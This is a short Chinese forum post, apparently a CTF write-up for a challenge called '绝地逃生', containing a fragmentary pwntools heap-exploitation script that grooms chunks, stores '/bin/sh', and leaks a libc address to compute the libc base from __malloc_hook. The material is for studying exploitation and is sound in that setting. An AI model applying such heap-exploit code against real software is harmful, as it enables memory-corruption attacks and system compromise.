-
-
[原创]绝地逃生 WP
-
发表于: 2019-6-26 12:25 5344
-
一血题。
没啥好说的,放WP,注意这个不能保证每次都能成功。
try:
add(0, 0xF8, 'A' * 1)
add(1, 0x68, 'B' * 1)
add(2, 0x68, 'C' * 1)
add(3, 0x68, '/bin/sh\x00' * 1)
for i in range(252):
add(i + 4, 0x10, 'A' * 1)
free(2, 254, 255)
except:
return
show(0)
leak_addr = p.recvuntil('\n1. ',drop = True)
leak_addr = u64(leak_addr.ljust(8, '\x00'))
print 'leak_addr ',hex(leak_addr)
libc.address = leak_addr - 96 - 0x10 - libc.symbols['__malloc_hook']
[峰会]看雪.第八届安全开发者峰会10月23日上海龙之梦大酒店举办!
最后于 2019-6-26 12:26
被xym编辑
,原因:
赞赏
他的文章
- [原创]第十二题 深入内核 4032
- [原创]第十一题 步步逼近 4474
- [原创]第八题 AI核心地带 3423
- [原创] 第七题 智能联盟计划 3597
- 第六题 至暗时刻 10364
看原图
赞赏
雪币:
留言: